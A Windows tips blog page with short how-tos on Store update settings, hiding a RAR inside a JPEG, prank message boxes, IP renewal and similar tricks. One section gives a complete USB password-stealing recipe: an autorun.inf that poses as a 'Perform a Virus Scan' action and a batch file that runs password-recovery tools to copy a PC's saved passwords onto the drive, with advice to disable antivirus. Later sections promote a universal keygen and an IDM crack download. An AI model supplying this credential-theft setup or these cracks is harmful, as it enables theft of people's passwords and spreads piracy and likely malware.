      In Windows 8 by default, setting is set to automatically update the apps that you have downloaded from “Windows App Store”. That means whenever an update for your downloaded app will appear in “Windows App Store” your Windows 8 will automatically start downloading and installing that update. No doubt this feature reduced manual efforts to update your favourite apps. But if you are not using an unlimited data plan it can increase your Band-width usage. Suppose you have a nigh-time unlimited data usage plan, then you may prefer all downloading jobs at night to save some day-time bandwidth.
      Using “windows group policy” you can easily disable automatic download of Windows Store application updates in Windows 8. It will not fully disable your Windows App Update feature. You will still able to check for any updates for your installed Windows apps (Metro Apps) manually and can download the updates.
      Follow the steps to disable automatic download of application updates in Windows 8. You must be signed in as an administrator to perform the following steps.

      Steps to disable automatic download of Windows Store application updates

      1. Press Windows Key + R to open Run dialog and type gpedit.msc, hit Enter. If prompted by User Account Control (UAC) dialog box, click on Yes.
      2. Now, in Local Group Policy Editor navigate to Computer Configuration->Administrative Templates->Windows Components->Store
      3. In the right-pane double click on Turn off Automatic Download of updates entry. A new window will appear.
      4. To disable automatic download of Windows Store application Updates set the radio selection buttons to Enabled, click OK. That’s it.

      To re-enable auto update feature set the radio button to Disable or Not Configured option.

      Hide Your Files In An Image

      How To Hide Your Files In Image.

      To hide your files in a image you must know some of commands of an windows command prompt and you must have a winrar. Now, lets begin.


      1. Gather all files (which you want to hide) in to an specific folder any where in your pc. ( i recommend C:\Hide)

      2. Now compress all files to  .rar extension ( i.e with winrar e.g. security.rar) and the file should also be in the same directory (C:\Hide).

      3. Now look for JPEG picture file (e.g. xyz.jpeg). Copy and paste that file also in  Specific folder you created  (i.e., C:\Hide) .

      4.  Open Command Prompt (Click Start--> Run --> cmd) and now you go to working directory (i.e C:\Hide ).

      5. In your command prompt you type

      copy /b xyz.jpeg  + security.rar output.jpeg


      Therefore security.rar is hidden in output.jpeg.
      Now output .jpeg contains xyz.jpeg and security.rar , if you want to view image( i.e xyz.jpeg) then you can open the output.jpeg in image viewer and if you want to open security.rar then you can open it with winrar archive.

      Make A Prank Error Messages On Windows

      Make A Prank Error Messages On Windows

      1. Start -> Run -> Notepad.
      2. Now copy and paste the following text below in your notepad.

      x=msgbox("Your Message Here", 2+32, "Your Title Here")
      3. Change the "Your message here" and "Your Title Here" to what ever you want. I have  used 2+32 because it is the error message type of windows.
      Here is the list of error messages.

      Buttons:

      0 - OK button only
      1 - OK and Cancel
      2 - Abort, Retry and Ignore
      3 - Yes, No and Cancel
      4 - Yes and No
      5 - Retry and Cancel

      Error Messages

      16 - Critical message icon/sound
      32 - Warning icon/sound
      48 - Warning message/sound
      64 - Info message/sound

      4. Now save the notepad as filename.vbs

      5. Click on filename.vbs , you will see error message on your screen.

      How To Request New Ip From Your ISP

      How To Request New Ip From Your ISP

      Some times our IP address will be blocked from websites or banned from websites then we have to we have to request new ip from aour ISP. In thsi tutorial i will teach you how to request an new IP.



      1. Click Start -> Run.
      2. In run type cmd and hit enter.


      3. In command prompt, type the following commands.

      ipconfig /flushdns
      ipconfig /release
      ipconfig /renew
      exit

      4. That's it! You will be assigne with an new IP address.

      Random Passsword Generator In cmd prompt

       Random Passsword generator In cmd prompt

      I  was browsing in the internet and found an simple utility for generating random passwords. Folow this tutorial to generate random passwords.


      1. Click start -> run -> notepad.
      2. In notepad type the following.
      @echo off
      :a
      echo Here are 4 random passwords
      echo %random%, %random%, %random%,%random%
      pause
      cls
      goto a
      3. Now save notepad with .bat extension.
      4. That's it you have created random password generator.

      Make Your Web Browser A Text Editor

      Make your web browser as text editor , have ever wondered making your wb browser as text editor?
      IF not then follow this simple tutorial on making your web browser as text editor.


      1. Open your browser.
      2. Type the following in the url bar.
      data:text/html, <html contenteditable>

      3. Now hit enter,  your web browser will acts as text editor.
      4. That's it!!!!

      How to Sniff Passwords Using USB Drive

      How to Sniff Passwords Using USB Drive


      Notice: You Must Diasable your Antivirus for creating a USB Sniffer.

      Download these Five tools first.

      After Downloading these tools , just copy the mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe files and save it on your USB drive.


      Now open your notepad and type the following text in it.
      [autorun]open=launch.bat
      ACTION= Perform a Virus Scan

      And now save the notepad as autorun.inf on your USB Drive.


      Now Again oper your notepad and type
      start mspass.exe /stext mspass.txt
      start mailpv.exe /stext mailpv.txt
      start iepv.exe /stext iepv.txt
      start pspv.exe /stext pspv.txt
      start passwordfox.exe /stext passwordfox.txt

       And save the notepad as launch.bat , now copy the launch.bat on to your USB Drive.


      Now Insert the USB on your pc, then  autorun pop up appears , click  on  perform virus scan then the passwords which are saved on your pc will  be stored in a USB Drive.

      Free Download Any Software

      Friday 13 September 2013

      Free Download Any Software


      Download Any Software You Wish For Free.
      Just Click On Like Or Follow.
      As Soon As You Click On Like Or Follow,
      The Button Will Change To Download Button.
      You Can Click On It And Download Any Software.








      Download Universal Keygen 2013

      Thursday 12 September 2013

      Download Universal Keygen 2013


      How To Find A Serial Key Of Any Software/Game For Free

      Universal Keygen 2013 is a very popular key generator. You Can Use This Software To Activate Your Software Free. You can generate your activation and serial key by using this software.


      Just Download And Run This Software And Search Your Serial.


      Features Of Universal Keygen 2013:

      • Generate all software Serial Key.
      • Search your software serial alphabetically.
      • Find your serial without internet connection easily.
      Install:
      1. Download The File.
      2. Install the Universal Keygen 2013
      3. Search your Software/Game and select it to generate the Serial Key.

      Download
      click to begin
      230KB .rar

        IDM with Crack

        Sunday 8 September 2013

        Download IDM with crack


        http://bmtricks.blogspot.com/

        Internet Download Manager (also called IDM) is a shareware download manager. It is only available for the Microsoft Windows operating system.

        Features

        • Divides downloads into multiple streams for faster downloading
        • Batch downloads
        • Import/Export download jobs
        • Auto/manual updating of download address
        • Multiple queues
        • Recent downloads list for easy access to files
        • Video downloading from streaming video sites.
        • Dynamic segmentation throughout the downloading process.
        • Protocols: HTTP, FTP, HTTPS, MMS and Microsoft ISA
        • Authentication protocols: Basic, Negotiate, NTLM, and Kerberos allowing for storage and auto-authentication of user names and passwords.
        • IDM supports the following web browsers: Internet Explorer, Opera, Netscape Navigator, Apple Safari, Flock, Google Chrome, Mozilla Firefox, and many others.


        http://bmtricks.blogspot.com/
        • IDM while downloading a file in Windows 8.
        Download IDM
        click to begin
        4.50MB .exe
        Download IDM Crack
        click to begin
        816KB .exe
        Password- softbond



        Download: Java App

        Copyright @ 2014 BM TRICKS 1. Designed by Surjit Singh